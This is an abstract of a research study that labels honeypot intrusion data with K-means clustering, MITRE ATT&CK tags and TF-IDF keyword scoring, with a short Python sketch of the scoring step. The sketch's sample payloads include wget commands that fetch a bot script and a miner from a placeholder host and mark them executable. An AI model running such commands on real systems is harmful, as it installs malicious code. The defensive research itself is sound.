This study uses the TF-IDF (Term Frequency-Inverse Document Frequency) term-weighting technique from information retrieval and text mining. Information about attackers' intrusions into the system is collected through honeypots, and data classification, manual labeling, machine learning, and the K-means algorithm are combined to produce reliable labeled data sets whose labels follow a third-party framework. The proposed method consists of three parts: (A) the K-means algorithm groups the raw data collected by the honeypots into clusters; (B) each cluster is manually labeled according to MITRE ATT&CK to provide reliable information; (C) each keyword in the payload is scored using the TF-IDF technique and sorted into the session table. In this study, 68,936,206 packets are used as test data, and the proposed method clusters the data with an accuracy of 99.5%.
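As an illustration of part C, the keyword scoring step might be sketched as follows. This is a minimal sketch, not the implementation used in the study: it assumes whitespace tokenization and the textbook weighting tf × log(N / df), and the function names `tfidf_scores` and `session_table` as well as the sample payloads are hypothetical.

```python
import math
from collections import Counter


def tfidf_scores(payloads):
    """Return one {keyword: score} dict per payload, using tf * log(N / df).

    Assumption: keywords are whitespace-separated tokens, lowercased.
    """
    tokenized = [p.lower().split() for p in payloads]
    n_docs = len(tokenized)

    # Document frequency: number of payloads that contain each keyword.
    df = Counter()
    for tokens in tokenized:
        df.update(set(tokens))

    scores = []
    for tokens in tokenized:
        counts = Counter(tokens)
        total = len(tokens)
        scores.append({
            term: (count / total) * math.log(n_docs / df[term])
            for term, count in counts.items()
        })
    return scores


def session_table(payloads):
    """Build (session_index, keyword, score) rows.

    Within each session, rows are sorted by descending score,
    with ties broken alphabetically by keyword.
    """
    rows = []
    for i, doc_scores in enumerate(tfidf_scores(payloads)):
        ranked = sorted(doc_scores.items(), key=lambda kv: (-kv[1], kv[0]))
        rows.extend((i, term, score) for term, score in ranked)
    return rows


# Hypothetical payloads, one per honeypot session (not data from the study).
payloads = [
    "wget http://example.invalid/bot.sh ; chmod 777 bot.sh",
    "cat /proc/cpuinfo ; uname -a",
    "wget http://example.invalid/miner ; chmod 777 miner",
]

for session, keyword, score in session_table(payloads):
    print(f"{session}\t{keyword}\t{score:.4f}")
```

Under this weighting, a token that occurs in every session (here the `;` separator) scores zero, while tokens unique to one session rank highest, which is the property that makes the sorted session table useful for manual inspection.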